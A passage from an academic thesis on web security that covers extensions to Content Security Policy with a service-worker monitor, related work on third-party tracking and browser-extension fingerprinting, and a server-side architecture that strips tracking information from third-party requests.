we applied all the 11,982 unique origins to check whether there was a match or not, and

saved the time it took for the algorithm to terminate. Then, we compute the average time

for applying all the 11,982 origins to the script. Figure 5.3 presents the results.

Unique Scripts

Time (ms)

0 1k 2k 3k 4k 5k 6k

0.005

0.01

0.015

0.02

0.025

Figure 5.3 – Overhead introduced by applying CSP to content

The overhead introduced with applying CSP is really negligible. Assume that a directive

contains 100 origins, in the worst case, the overhead introduced by applying CSP is less

than 2.5 ms, which in our opinion, is acceptable, compared to the security benefits gained

with deploying CSP in blacklisting mode.

6 Discussions and limitations

Here we discuss the limitations of the service workers we used to implement the monitor

in this work.

6.1 Service workers

Service workers is still a working draft at the W3C 8, even though it is already supported

by major browsers, including Firefox, Chrome, Opera, Microsoft Edge and Safari. They

are backwards compatible: browsers not supporting them will not deploy the monitor,

without breaking the application. Developers do not have to serve specific versions of the

application for browsers not supporting service workers. Deploying the monitor as shown

in Listing 5.18 (Section 4) ensures its backwards compatibility. The only modification

required is in the entry page to the application, where the monitor should be indicated,

using an HTML script tag. Even though, using service workers introduce an overhead, there

are many improvements which can compensate this overhead, in addition to the security

benefits that one would gain by deploying them. Responses to requests can be cached

8. https://w3c.github.io/ServiceWorker/

PUT(0,-845.90042)

96 CHAPTER 5. EXTENDING CSP

in the monitor. Later on, when the application makes a request for the same content,

it is retrieved from the cache and returned to the application. In this work, we have

shown an implementation of the monitor using service workers. The monitor presents the

advantage of laying outside of the browser enforcement of CSP. It only intercepts requests

after they are allowed by the browser upon enforcement of the CSP of the page. This

allows to further check for blacklisted content or content with unsafe arguments. In the

monitor, we log requests, and can delay the report time. Nonetheless, service workers have

limitations. They work only for secure (HTTPS) web applications (and the localhost).

They do not work in Firefox private browsing mode. Also in Firefox, it is not easy to get

the type (script, image, ...) of the intercepted request. Service workers cannot intercept

requests to load cross-origin iframes, for security reasons. Nonetheless, the monitor can be

successfully deployed for content which executes in the context of the application such as

scripts, plugins, stylesheets, images, etc.

Alternative methods can also be used to implement the monitor especially for browsers not

yet supporting service workers: JavaScript proxies [82], or redefining JavaScript objects to

intercept the injection of content [254]. To get all content that are injected in a webpage,

similarly to a restrictive CSP in report-only mode (See Section 2), one can make use of

Mutation Observers [102]. They allow to watch all changes made to the DOM of a webpage.

As such, one can record all content that are injected in the webpage. These methods have

many drawbacks. The first one is that they can potentially interfere with CSP enforcement

as done by browsers. Moreover, contrary to these methods, service workers are easy to

deploy, and can monitor all pages of entire web applications.

6.2 Browser extensions

Contrary to CSP in report-only mode, our monitor intercepts all content even those injected

by browser extensions directly in the context of web applications. Content that browser

extensions directly inject in the context of web applications9, are usually not subject to the

CSP of the page, and browsers would not block them. Such content are also intercepted in

the monitor. If the browser allows them to load, even though they do not match the CSP of

the page, the monitor instead would block them if they are not allowed by the blacklisting

policy. Blocking such requests may however break extensions functionality. We did not

assess how widespread this practice is among extensions, but applications developers have

to take this into consideration when deploying our monitor. Should extensions content be

blocked or not? Developers have to find a trade-off between the security of their applications

and preserving the functionality of extensions [249].

6.3 Privacy implications of the reporting mechanism

In general, our proposal of monitoring the runtime enforcement of CSP, has to be discussed

in the scope of browser extensions. Currently, a developer can observe content injected by

browser extensions in web applications, by inspecting the DOM, setting up a Mutation

Observer [102] or deploying a service worker as we have done. Since content injected in

web pages by browser extensions are visible to web pages, we argue that browser vendors

may also report such content to developers when reporting the runtime enforcement of

CSP. Therefore reporting content does not leak any further information than what could

9. These are not content scripts, as content scripts execute in their own contexts. These are content fur-

ther injected by content scripts directly in the context of web pages (See https://developer.chrome.com/

extensions/content_scripts). In Chrome and Opera, even web accessible resources are also intercepted

(See https://developer.chrome.com/extensions/manifest/web_accessible_resources)

PUT(0,-845.90042)

7. CONCLUSION 97

already be obtained with the examples of techniques given above. Our proposal is just an

efficient way for getting feedback, without relying on the techniques presented here, given

their limitations.

There are however cases where extension developers would like to hide their injected content

from web applications. For instance, in Firefox, injecting browser extensions own content,

called web accessible resources, leak the extension unique identifier, which is unique on a per

user basis. If this identifier is leaked to the web application, it can serve to uniquely identify

and track her in future browsing sessions, as the identifier is unique for the extension and

does not change throughout browsing sessions [245]. In general, it is difficult to hide

this identifier from web applications. Setting up a mutation observer allows to intercept

the identifier. We think that such content must also be reported as they can already be

observed by different means.

There is however one case, recommended to prevent leaking extension’s identifiers, in the

particular case of iframes injection, as discussed on Bugzilla [20].

var f=document.createElement(" iframe") ;

document.body.appendChild(f);

f.contentWindow.location =chrome.extension.getURL(" i f ra me . ht m " )

;

As shown in the listing above, one can inject an iframe without leaking the unique identifier

of the extension. From a mutation observer, is is not possible to observe the URL of such

an iframe, and scripts running in the page cannot also observe it. Finally, service workers

cannot intercept the URLs of cross-origin iframes. In this situation, and for the sake of

user privacy, one may argue that the monitor of the runtime enforcement of CSP must

not report the URLs of iframes included as such. We think that since such content are

included in the webpage, they must also be reported.

7 Conclusion

In this work, we propose four new extensions to the current CSP specification: a new

blacklisting mode, the ability to blacklist content based on unsafe URL arguments, new

directives for explicitly preventing redirections to partially whitelisted origins and an ef-

ficient monitoring mechanism for collecting feedback of the runtime enforcement of CSP.

These extensions are all backwards compatible, and do not break the current state of the

specification, nor do they require significant modifications from current browsers implemen-

tations of the specification. We demonstrated an implementation of the new extensions

using service workers, to monitor and intercept content that load on the policy, and apply

additional checks on the URLs of content. We then evaluated the overhead of deploying

such a policy on a web application. The monitor is easily integrated to the application by

the developer from the server-side, without requiring users or browsers to undertake any

particular action.

PUT(0,-845.90042)

PUT(0,-845.90042)PUT(0,-845.90042)

PUT(0,-845.90042)

Part II

Third party web tracking

PUT(0,-845.90042)

PUT(0,-845.90042)PUT(0,-845.90042)

PUT(0,-845.90042)

Introduction

A number of studies have demonstrated that third party tracking is very prevalent on the

web today and they have analyzed the underlying tracking technologies [188,217,225,242].

Lerner et al. [222] analyzed how third party tracking evolved for a period of twenty

years. Trackers have been categorized either according to their business relationships

with websites [225], their prominence [188,217] or the user browsing profile that they

can build [242]. Mayer and Mitchell [225] grouped tracking mechanisms into two cate-

gories called stateful (cookie-based and super-cookies) and stateless (fingerprinting). It

is rather intuitive to convince ourselves of the effectiveness of a stateful tracking, since

it is based on unique identifiers that are set in users’ browsers. Nonetheless, the efficacy

of stateless mechanisms has been extensively demonstrated. Since the pioneer work of

Eckersley [185], browser fingerprinting methods have been extensively studied in the liter-

ature [163–165,173,180,188,221,230,259,263]. A classification of fingerprinting techniques

is provided in [264]. Those studies have contributed to raising public awareness of tracking

privacy threats. Mayer and Mitchell [225] have shown that users are very sensitive to their

online privacy, thus hostile to third party tracking. Englehardt et al. [189] have demon-

strated that tracking can be used for surveillance purposes. The success of anti-tracking

defenses is yet another illustration that users are concerned about tracking [226].

Extensions and web logins detections Since 2006, there have been multiple proposals

to detect and enumerate user’s browser extensions [175,182,193,216]. Most of them were

blog posts that were meant to raise awareness in the security community, but did not aim

to scientifically evaluate extension detection at large scale, nor to perform user studies,

that could explain how extensions contribute to browser fingerprinting. Similarly, there

has been an ongoing discussion on Web login detection in the security community [169,

187,194,206,207,223], but no quantitative studies have been made until our work.

Sjösten et al. [249] provided the first large scale study on enumerating all free browser

extensions that were available on Chrome and Firefox. The authors found that 38.96%

of top 10k extensions in the Chrome Web Store were detectable with WARs. While their

work lacked the evaluation of user uniqueness or fingerprintability, it disclosed the fact

that 28 of the Alexa top 100k sites already used extensions detection. This finding made

it clear that extension detection is more than a theoretical privacy threat, thus deserving

further studying.

Starov and Nikiforakis [260] were the first to analyze fingerprintability of browser extensions

and evaluating how unique users are, based on their extensions. They detected extensions

based on the changes they make to the webpages. They examined the top 10,000 Chrome

extensions and found that 9.2% of them were detectable on any website, and 16,6% made

detectable changes on specific domains with 90% accuracy. They analyzed the stability

of the proposed detection method. For a sample of 1,000 extensions, they concluded that

88% of extensions were still detectable after 4 months. To evaluate uniqueness of users

based on their browser extensions, the authors collected installed extensions for 854 users.

101

PUT(0,-845.90042)

102

To detect 5 extensions, their testing website needed roughly 250 ms.

Sánchez-Rola et al. [245] detected browser extensions through a timing side-channel attack,

and were able to detect all extensions in Firefox and Chrome that use access control

settings, regardless of the site visited. Their detection technique also relies on WARs.

When querying a non-exist (fake) WAR of an extension, the authors observed a difference

in the time the browser takes to respond to the query, depending on whether the extension

was installed in the user’s browser or not. The difference in time is caused by the access

control mechanism of the browser when the concerned extension is installed or not in the

browser. Because of this timing method, they had to make 10 calls per extension. To

quantify the fingerprintability of users, they collected fingerprints from only 204 users and

tested for 2,000 Chrome and Firefox extensions. In total, their users had 174 extensions

that were fingerprintable.

Tracking protection There are a number of defenses that try to protect users against

third party tracking. First, major browser vendors provide mechanisms for users to block

third party cookies or browse in private/incognito mode for instance. More and more

browsers even take a step further, by considering privacy as a design principle: Brave

Browser [16], Tor Browser [136], TrackingFree [234], Blink [221], CLIQZ [29]. Pierre Laper-

drix has done substantial work on browser fingerprinting, its stability and proposed different

countermeasures as to mitigate them [191,218–221,266].

Well known trackers such as advertisers, which businesses heavily depend on their ability

to track users, have also been taking steps towards limiting their own tracking capabili-

ties [225]. The W3C is pushing forward the Do Not Track standard [137,138] for users to

easily express their tracking preferences so that trackers may comply with them.

But the most popular defenses are browser extensions. Being tightly integrated into

browsers, they provide additional privacy features that are not by default, implemented

in browsers. Well known privacy extensions are Disconnect [47], Ghostery [61], Share-

MeNot [242] which is now part of PrivacyBadger [117], uBlock Origin [139] and a relatively

new MyTrackingChoices [167]. Merzdovnik et al. [226] provide a large-scale evaluation of

these anti-tracking defenses.

Tracking protection from the server-side

In Chapter 6, we describe and implement a privacy-preserving web architecture that gives

website developers a control over third party tracking: developers are able to include

functionally useful third party content, while at the same time ensuring that the end users

are not tracked by the third parties. The architecture consists in two main components: a

ready-to-deploy Rewrite Server, deployed by the developer server-side in order to rewrite

webpages, and more precisely the URLs of third party content, by prefixing them with

the URL of the second component, the Middle Party Server. Therefore, when the page

loads in a browser, all third party requests are redirected to the Middle Party Server. It

is a ready-to-deploy trusted third party server, under the control of the developer. When

it receives requests from the browser to load third party content, it removes any tracking

information from the requests and forwards them to the third party. Also, when it receives

a response from the third party, it removes tracking information then returns the response

to the browser.

PUT(0,-845.90042)

103

Browser fingerprinting with extensions and web logins

Chapter 7reports on the first large-scale behavioral uniqueness study based on 16,393. To

do so, we set up a website with the aim to collect fingerprints from users, that are the

browser extensions they have installed, and the websites they are logged into. We test

and detect the presence of 16,743 Chrome extensions, covering 28% of all free Chrome

extensions. We also detect whether the user is connected to 60 different websites. We used

Web Accessible Resources [249] to detect extensions, and analyzed all free Chrome Web

Store extensions. We observed that 27−28% of all free Chrome extensions were detectable

on any website with 100% accuracy, and the presence of an extension can be detected in

around 1ms. We analyzed the stability of the proposed detection method. In our study, we

analyzed 12,164 extensions, and conclude that 72.4% of them are detectable every month

during the 9-months period.

We analyze how unique users are based on their behavior, and find out that 54.86% of

users that have installed at least one detectable extension are unique; 19.53% of users are

unique among those who have logged into one or more detectable websites; and 89.23% are

unique among users with at least one extension and one login.

We use an advanced fingerprinting algorithm and show that it is possible to identify a

user in less than 625 milliseconds by selecting the most unique combinations of extensions.

Because privacy extensions contribute to the uniqueness of users, we study the trade-off

between the amount of trackers blocked by such extensions and how unique the users of

these extensions are. We have found that privacy extensions should be considered more

useful than harmful. The chapter concludes with possible countermeasures.

PUT(0,-845.90042)

PUT(0,-845.90042)PUT(0,-845.90042)

PUT(0,-845.90042)

Chapter 6

Third party tracking protection solution for web

developers

This chapter presents a server-side tracking prevention solution for web developers. It is a

proposal of a web architecture that can be easily implemented by web developers, by just

plugging it to existing web servers, in order to protect all their users against third party

tracking. The main intuition is to redirect all third party content to a trusted Middle Party

Server which removes tracking information from third party requests and responses.

The content of this chapter are replicated from the paper entitled "Control What You

Include! Server-Side Protection against Third Party Web Tracking" which was published

on 9th International Symposium on Engineering Secure Software and Systems (ESSoS) in

2017.

1 Introduction

Third party tracking is the practice by which third parties recognize users across differ-

ent websites as they browse the web. In recent years, tracking technologies have been

extensively studied and measured [185,188,217,225,230,242] – researchers have found that

third parties embedded in websites use numerous technologies, such as third-party cookies,

HTML5 local storage, browser cache and device fingerprinting that allow the third party

to recognize users across websites [250] and build browsing history profiles. Researchers

found that more than 90% of Alexa top 500 websites [242] contain third party web tracking

content, while some sites include as much as 34 distinct third party content [222].

But why do website developers include so many third party content (that may track their

users)? Though some third party content, such as images and CSS [22] files can be copied

to the main (first-party) site, such an approach has a number of disadvantages for other

kinds of content. Advertisement is the base of the economic model in the web – without

advertisements many website providers will not be able to financially support their web-

site maintenance. Third party JavaScript libraries offer extra functionality: though

copies of such libraries can be stored on the main first party site, this solution will sacrifice

maintenance of these libraries when new versions are released. The developer would need

to manually check the new versions. Web mashups, such as applications that use hotel

searching together with maps, are actually based on reusing third-party content, as well

as maps, and would not be able to provide their basic functionality without including the

third-party content. Including JavaScript libraries, content for mashups or advertisements

means that the web developers cannot provide to the users, the guarantee of non-tracking.

Apart from an ethical decision not to track users, since May 2018, websites owners now

105

PUT(0,-845.90042)

106 CHAPTER 6. SERVER-SIDE TRACKING PROTECTION

have a legal obligation as well not to track users. The ePrivacy directive (also know as

‘cookie law’) has been updated to a regulation, and make website owners liable for third

party tracking that takes place in their websites. This regulation applied to all the services

that are delivered to any individual located in the European Union. This regulation apply

high penalties for any violation [161]. Hence, privacy compliance will be of high interest

to all website owners and developers, and today there is no automatic tool that can help

to control third party tracking.To keep a promise of non-tracking, the only solution today

is to exclude any third-party content 1, thus trading functionality for privacy.

In this chapter, we present a new web application architecture that allows web developers

to gain control over certain types of third party content. Our solution is based on the

automatic rewriting of the web application in such a way that the third party requests

are redirected to a trusted web server, with a different domain than the main site. This

trusted web server may either be controlled by a trusted party, or by a main site owner – it

is enough that the trusted web server has a different domain. A trusted server is needed so

that the user’s browser will treat all redirected requests as third party requests, like in the

original web application. The trusted server automatically eliminates third-party tracking

cookies and other technologies.

In summary our contributions are:

— A classification of third party content that can and cannot be controlled by the

website developer.

— An analysis of third party tracking capabilities – we analyze two mechanisms: recog-

nition of a web user, and identification of the website she is visiting 2.

— A new architecture that allows to include third party content in web applications

and eliminate stateful cookie-based tracking.

— An implementation of our architecture, demonstrating its effectiveness at preventing

stateful third party tracking in several websites.

2 Background and motivation

Third party web tracking is the ability of a third party to re-identify users as they browse

the web and record their browsing history [225]. Tracking is often done with the purpose

of web analytics, targeted advertisement, or other forms of personalization. The more a

third party is prevalent among the websites a user interacts with, the more precise is the

browsing history collected by the tracker. Tracking has often been conceived as the ability

of a third party to recognize the web user. However, for successful tracking, each user

request should contain two components:

User recognition is the information that allows tracker to recognize the user;

Website identification is the website that the user is visiting.

For example, when a user visits news.com, the browser may make additional requests to

facebook.com. As a result, Facebook learns about the user’s visit to news.com. Figure 6.1

shows a hypothetical example of such tracking where facebook.com is the third party.

Consider that a third party server, such as facebook.com hosts different content, and

some of them are useful for the website developers. The web developer of another website,

1. For example, see https://duckduckgo.com/.

2. Tracking is often defined as the ability of a third party to recognize a user through different websites.

However, being able to identify the websites a user is interacting with is equally crucial for the effectiveness

of tracking.

PUT(0,-845.90042)

2. BACKGROUND AND MOTIVATION 107

Figure 6.1 – Third Party Tracking

say mysite.com, would like to include such functional content from Facebook, such as

Facebook "Like" button, an image, or a useful JavaScript library, but the developer does

not want its users to be tracked by Facebook. If the web developer simply includes third

party Facebook content in his application, all its users are likely to be tracked by cookie-

based tracking. Notice that each request to facebook.com also contains an HTTP Referrer

header, automatically attached by the browser. This header contains the website URL that

the user is visiting, which allows Facebook to build the user’s browsing history profile.

The example demonstrates cookie-based tracking, which is extremely common [242]. Other

types of third party tracking, that use client-side storage mechanisms, such as HTML5 Lo-

calStorage, or cache, and device fingerprinting that do not require any storage capabilities,

are also becoming more and more popular [188].

Web developer perspective

A web developer may include third party content in her webpages, either because this

content intentionally tracks users (for example, for targeted advertising), or because

this content is important for the functioning of the web application. We therefore distin-

guish two kinds of third party content from a web developer perspective: tracking and

functional.Tracking content is intentionally embedded by website owner for tracking

purposes. Functional content is embedded in a webpage for other purposes than track-

ing: for example, JavaScript libraries that provide additional functionality, such as jQuery,

or other components, such as maps. In this work, we focus on functional content and

investigate the following questions:

— What kind of third party content can be controlled from a server-side (web developer)

perspective?

— How to eliminate the two components of tracking (user recognition and website iden-

tification) from functional third party content that websites embed?

2.1 Browsing context

When a browser renders a webpage delivered by a first party, the page is placed within

abrowsing context [19]. A browsing context represents an instance of the browser in

which a document such as a webpage is displayed to a user, for instance browser tabs, and

popup windows. Each browsing context contains 1) a copy of the browser properties (such

as browser name, version, device screen etc), stored in a specific object; 2) other objects

that depend on the origin of the document according to SOP. For instance, the object

document.cookie gives the cookies related to the domain and path of the current context.

In-context and cross-context content. Certain types of content embedded in a webpage,

such as images, links, and scripts, are associated with the context of the webpage, and

PUT(0,-845.90042)

108 CHAPTER 6. SERVER-SIDE TRACKING PROTECTION

we call them in-context content. Other types of content, such as <iframe>,<embed>,

and <object> tags are associated with their own browsing context, and we call them

cross-context content. Usually, cross-context content, such as <iframe> elements, cannot

be visually distinguished from the webpage in which they are embedded, however they are

as autonomous as other browsing contexts, such as tabs or windows. Table 6.1 shows

different third party content and their execution contexts.

Table 6.1 – Third party content and execution context

HTML tags Third party content

in-context

<link> stylesheets

<img> images

<audio> audios

<video> videos

<form> forms

<script> scripts

cross-context <(i)frame>, <frameset>, <a>, <area> web pages

The Same Origin Policy manages interactions between different browsing contexts. In

particular, it prevents in-context scripts from interacting with cross-context iframes in

case their origins are different. To communicate, they may use inter-frame communication

APIs such as postMessage [116].

2.2 Third party tracking

In this work, we consider only stateful tracking technologies – they require an identifier to

be stored on the client-side. The most common storage mechanism is cookies, but others,

such as HTML5 LocalStorage and browser cache can also be used for stateful tracking.

Figure 6.2 presents the well-known stateful tracking mechanisms [225]. We distinguish two

components necessary for successful tracking: user recognition and website identification.

For each component, we describe the capabilities of in-context and cross-context. We also

distinguish passive tracking (through HTTP headers) and active tracking (through

JavaScript or plugin script).

User recognition Website identification

Passive Active Passive Active

in-context HTTP cookies

Cache-Control

Etag

Last-Modified

-Referer

Origin

document.URL

document.location

window.location

cross-context

Flash LSOs

document.cookie

window.localStorage

window.indexedDB

Referer document.referrer

Figure 6.2 – Stateful tracking mechanisms

In-context tracking. In-context third party content is associated with the browsing

context of the webpage that embeds it (see Table 6.1).

PUT(0,-845.90042)

2. BACKGROUND AND MOTIVATION 109

Passively, such content may use HTTP headers to recognize a user and identify the

visited website. When a webpage is rendered, the browser sends a request to fetch all third

party content embedded in that page. The responses from the third party, along with the

requested content, may contain HTTP headers that are used for tracking. For example,

the Set-cookie HTTP header tells the browser to save third party cookies, that will be

later on automatically attached to every request to that third party in the Cookie header.

Etag HTTP header and other cache mechanisms like Last-Modified and Cache-Control

HTTP headers may also be used to store user identifiers [250] in a browser. To identify the

visited website, a third party can either check the Referer HTTP header, automatically

attached by the browser, or an Origin header 3.

Actively, in-context third party content cannot use browser storage mechanisms, such as

cookies or HTML5 Local Storage associated to the third party because of the limitations

imposed by the SOP (see Section 2.1). For example, if a third party script from third.com

uses document.cookie API, it will read the cookies of the main website, but not those

of third.com. This allows tracking within the main website but does not allow tracking

cross-sites [242]. For website identification, third party active content, such as scripts, can

use several APIs, for example document.location.

Cross-context tracking. Cross-context content, such as iframe, is associated with the

browsing context of the third party that provided this content.

Passively, the browser may transmit HTTP headers used for user recognition and website

identification, just like in the case of in-context content. Every third-party request for

cross-context content will contain the URL of the embedding webpage in its Referer

header.

Requests to fetch third party content further embedded inside a cross-context (such as

iframe) will carry, not the URL of the embedding webpage, but that of the iframe in their

Referer or Origin headers (in the case of CORS requests). This prevents them from

passively identifying the embedding webpage.

Actively, cross-context third party content can use a number of APIs to store user identi-

fiers in the browser. These APIs include cookies (document.cookie), HTML5 LocalStorage

(document.localStorage), IndexedDB, and Flash Local Stored Objects (LSOs). For web-

site identification, document.referrer API can be used – it returns the value of the HTTP

Referrer header transmitted in the request to the cross-context third party.

Combining in-context and cross-context tracking. Imagine a third party script from

third.com embedded in a webpage – according to the context and to the SOP, it is in-

context. If the same webpage embeds a third party iframe from third.com (cross-context),

then because of SOP, such script and iframe cannot interact directly. However, they can

still communicate through inter-frame communication APIs such as postMessage [116].

On one hand, the in-context script can easily identify the website using APIs such as

document.location. On the other hand, the cross-context iframe can easily recognize the

user by calling document.cookie. Therefore, if the iframe and the script are allowed to

communicate, they can exchange those partial tracking information to fully track the user.

For example, a social widget, such as the Facebook "Like" button, or Google "+1" button,

may be included in webpages as a script. When the social widget script is executed on the

client-side, it loads additional scripts, and new browsing contexts (iframes) allowing the

third party to benefit from both in-context and cross-context capabilities to track users.

3. Origin header is also automatically generated by the browser when the third party content is trying

to access data using Cross-Origin Resource Sharing [40] mechanism.

PUT(0,-845.90042)

110 CHAPTER 6. SERVER-SIDE TRACKING PROTECTION

3 Privacy-preserving web architecture

For third party tracking to be effective, two capabilities are needed: 1) the tracker should be

able to identify the website in which it is embedded, and 2) recognize the user interacting

with the website. Disabling only one of these two capabilities for a given third party

already prevents tracking. In order to mitigate stateful tracking (see Section 2), we make

the following design choices:

1. Preventing only user recognition for in-context. As shown in Table 6.2, in-

context content cannot perform any active user recognition. We are left with passive

user recognition and (active and passive) website identification. Preventing passive

user recognition for such content (images, scripts, forms) is possible by removing

HTTP headers such as Cookie, Set-cookie, ETag that are sent along with re-

quests/responses to fetch those content.

Note that it is particularly difficult to prevent active website identification because

trying to alter or redefine document.location or window.location APIs, will cause

the main page to reload. Therefore, in-context active content (scripts) can still

perform active website identification. That notwithstanding, since we remove their

user recognition capability, tracking is therefore prevented for in-context content.

2. Preventing only website identification for cross-context. We prevent passive

website identification by instructing the browser not to send the HTTP Referer

header along with requests to fetch a cross-context content. Therefore, when the

cross-context content gets loaded, the tracker is unable to identify the website in

which it is embedded in. Indeed, executing document.referrer returns an empty

string instead of the URL of the embedding page.

Because of the limitations of the SOP, a website owner has no control over cross-

context third party content, such as iframes. Therefore, active and passive user

recognition can still happen in third party cross-context. We discuss other possibil-

ities to block some active user recognition APIs in Section 4.1. Nonetheless, since

website identification is not possible, tracking is therefore prevented for cross-context

third party content.

3. Preventing communication between in-context and cross-context content.

Our architecture proposes a way to block such communications that can be done by

postMessage API. We discuss the limitations of this approach in Section 4.1.

To help web developers keep their promises of non-tracking and still include third-party

content in their web applications, we propose a new web application architecture. This

architecture allows web developers to 1) automatically rewrite the URLs of all in-context

third party content embedded in a web application, 2) redirect those requests to a trusted

third party server which 3) remove/disable known stateful tracking mechanisms (see

Section 2) for such content; 4) rewrite and redirect cross-context requests to the trusted

third party so as to prevent website identification and communication with in-context

scripts.

Figure 6.3 provides an overview of our web application architecture. It introduces two new

components fully controlled by the website owner.

Rewrite Server (Section 3.1)acts like a reverse proxy [122] for the original web server.

It rewrites the original web pages in such a way that all the requests to fetch all the third

party content that they embed are redirected through the Middle Party Server before

reaching the intended third party server.

PUT(0,-845.90042)

3. PRIVACY-PRESERVING WEB ARCHITECTURE 111

Figure 6.3 – Privacy-Preserving Web Architecture

Middle Party Server (Section 3.2)is at the core of our solution since it intercepts all

browser third party requests, removes tracking, then forwards them to the intended third

parties. For every response from a third party, the server removes tracking information

and forwards the response back to the browser. For in-context content such as images and

scripts, the Middle Party Server prevents user recognition and website identification, while

for cross-context content such as iframes, it prevents website identification and communi-

cation with other in-context scripts.

3.1 Rewrite Server

The goal of the Rewrite Server is to rewrite the original content of the requested webpages

in such a way that all third party requests will be redirected to the Middle Party Server.

It consists of three main components: static HTML rewriter for HTML pages, static CSS

rewriter and JavaScript injection component. In each webpage, a JavaScript code is loaded

that ensures that all dynamically generated third party content are redirected to the Middle

Party Server as well.

HTML and CSS Rewriter rewrites the URLs of static third party content embedded in

original web pages and CSS files in order to redirect them to the Middle Party Server. For

example, the URL of a third-party script source http://third.com/script.js is written

so that it is instead fetched through the Middle Party Server: http://middle.com/?src=

http://third.com/script.js. The HTML Rewriter component is implemented using

the Jsdom HTML parser [69], and CSS Rewriter, using the CSS parser [44] module for

Node.js.

JavaScript Injection. The Rewrite Server also injects a script in all original webpages

after they are rewritten. This script controls APIs used to dynamically inject content inside

a webpage once the webpage is rendered in a browser. It is available at https://webstats.

inria.fr/sstp/dynamic.js. Table 6.2 shows APIs that can be used to dynamically inject

third party content within a webpage. They are controlled using the injected script.

AContent Security Policy (CSP) [275] is injected in the response header of each

webpage in order to prevent third parties from bypassing the rewriting and redirection to

PUT(0,-845.90042)

112 CHAPTER 6. SERVER-SIDE TRACKING PROTECTION

Table 6.2 – Injecting dynamic third party content

API Content

document.createElement inject content from Table 6.1

document.write any content

window.open Web pages(popups)

Image images

XMLHttpRequest any data

Fetch, Request any content

EventSource stream data

WebSocket websocket data

the Middle Party Server. A CSP delivered with the webpage controls the resources of that

page by specifying which resources are allowed to be loaded and executed. By limiting the

resource origins to only those of the Middle Party Server and the website own domain, we

prevent third parties from bypassing the redirection to the Middle Party Server in order

to load content directly from a third party server. Such attempts will get blocked by the

browser upon enforcement of the CSP of the page. The following listing gives the CSP

injected in all webpages, assuming that middle.com is the domain of the Middle Party

Server.

Co n t en t- S ec ur i ty -P o li cy : de f a ul t -s r c ’s e l f ’ middle.com;

obj e c t- s rc ’ s e lf ’ ;

Figure 6.4 – Preventing trackers from combining in-context and cross-context tracking

3.2 Middle Party

The main goal of the Middle Party is to proxy the requests and responses between browsers

and third parties in order to remove tracking information exchanged between them. It

functions differently for in-context and cross-context content.

In-context content are scripts, images, etc. (see Table 6.1). Since a third party script

from http://third.com/script.js is rewritten by the Rewrite Server to http://middle.

com/?src=http://third.com/script.js, it is fetched through the Middle Party Server.

This hides the third party destination from the browser, and therefore prevents it from

attaching third party HTTP cookies to such requests. Because the browser will still

PUT(0,-845.90042)

3. PRIVACY-PRESERVING WEB ARCHITECTURE 113

attach some tracking information to the requests, when the middle party receives a re-

quest URL from the browser, it will then take the following steps. Remove tracking

from request that are set by the browser as HTTP headers. Among those headers are

Etag, If-Modified-Since, Cache-Control, Referer. Next, it makes a request to the

third party in order to get the content of the script http://third.com/script.js.Re-

move tracking from response returned by the third party. The headers that the third

party may send are Set-Cookie, Etag, Last-Modified, Cache-Control.CSS Rewriter

rewrites the response if the content is a CSS file, in order to also redirect to the Mid-

dle Party Server any third party content that they may embed. Finally, the response is

returned back to the browser.

Cross-context content are iframes, links, popups, etc. (see Table 6.1). The Middle Party

Server prevents website identification for cross-context content and communication with

in-context scripts. This is done by loading cross-context content from another cross-context

controlled by the Middle Party Server as illustrated in Figure 6.4.

For instance, a third party iframe from http://third.com/page.html is rewritten to

http:// middle.com/?emb=http://third.com/page.html. When the Middle Party Server

receives such a request URL from the browser, it takes the following actions: URL

Rewriting. Instead of fetching directly the content of http://third.com/page.html,

the Middle Party Server generates a content in which it puts the URL of the third party

content as a hyperlink <a href = "http://third.com/page.html" rel = "noreferrer

noopener"></a>. The most important part of this content is in the rel attribute value.

Therefore, noreferrer noopener instructs the browser not to send the Referer header

when the link http://third.com/page.html is navigated. JavaScript Injection mod-

ule adds a script to the content so that the link gets automatically navigated once the

content is rendered by the browser. Once the link is followed, the browser fetches the third

party content directly on the third party server, without going through the Middle Party

server anymore. However it does not include the Referer header for identifying the web-

site. Therefore, the document.referrer API also returns an empty string inside the iframe

context. This prevents it from identifying the website. The third party server response is

placed in a new iframe nested within a context that belongs to the Middle Party, and not

directly in the site webpage. This prevents in-context scripts and the cross-context content

from exchanging tracking information as illustrated in Figure 6.4.

HTTPS content. We recommend deploying the Middle Party Server as an HTTPS

server. Therefore, third party content originally served over HTTPS (before rewriting)

still get served over HTTPS even in the presence of the Middle Party Server . Moreover,

third party content originally served over HTTP would get blocked by current browsers

according to the Mixed Content policy [273]. With an HTTPS Middle Party, HTTP third

party requests will not be prevented from loading since they are fetched over HTTPS

through the Middle Party.

Multiple redirections. A third party may attempt to circumvent our solution by per-

forming multiple redirections. This is commonly used in advertisements (though ads are

not within the scope of this work).

When a (third party) web server wants to perform a redirection to another server, it usually

does so by including in the response, a special HTTP Location that indicates the server to

which the next request will be sent. The Middle Party Server prevents such circumvention

by rewriting the Location header so that the browser sends the next redirection request to

the Middle Party Server again. As a result, all the redirections pass via the Middle Party.

PUT(0,-845.90042)

114 CHAPTER 6. SERVER-SIDE TRACKING PROTECTION

4 Implementation

We have implemented both the Rewrite Server and the Middle Party Server as full Node.js [105]

web servers supporting HTTP(S) protocols and web sockets. Implementation details are

available at http://www-sop.inria.fr/members/Doliere.Some/essos/.

Rewrite Server

In our implementation, we deploy the Rewrite Server on the same physical machine as

the original web application server. In order to do so, we moved the original server on a

different port number, and the Rewrite Server on the initial port of the original server.

Therefore, requests that are sent by browsers first reach the Rewrite Server. It then simply

forwards them to the original server, which handles the request as usual and returns a

response to the Rewrite Server. Then, HTML webpages, and CSS files are rewritten using

the HTML Rewriter and CSS Rewriter components respectively. To handle dynamic

third party content, we inject a script. And in order to prevent malicious third parties

from bypassing the redirection, we inject a CSP (See Section 3.1).

Middle Party

All requests to load third party contents embedded in a website deploying our architecture

will go through the Middle Party Server. in-context and cross-context contents are handled

differently.

In-context content are simply stripped off tracking information that they carry from the

browser to the third parties and vice versa. See Section 3for the list of tracking information

that are removed from third party requests and responses. In particular, third party CSS

responses are rewritten, using the CSS Rewriter component, to redirect to the Middle

Party Server any third party content that they may further embed. As in the case of the

Rewrite Server, this component is implemented using a CSS parser [44] for Node.js

Cross-context content are handled in a way that the original website identity is not

leaked to them. They are also prevented from communicating with any in-context third

party content to exchange tracking information. If the cross-context URL was http:

//third.com/page.html, instead of making a request to third.com, the Middle Party

Server returns to the browser, a response consisting of rewriting the URL to

<a h r ef = " h tt p: / / t hi r d. co m / p ag e .h t ml " rel=" n o re f er r er n o op e ne r " ><

/a>.

and injecting the following script:

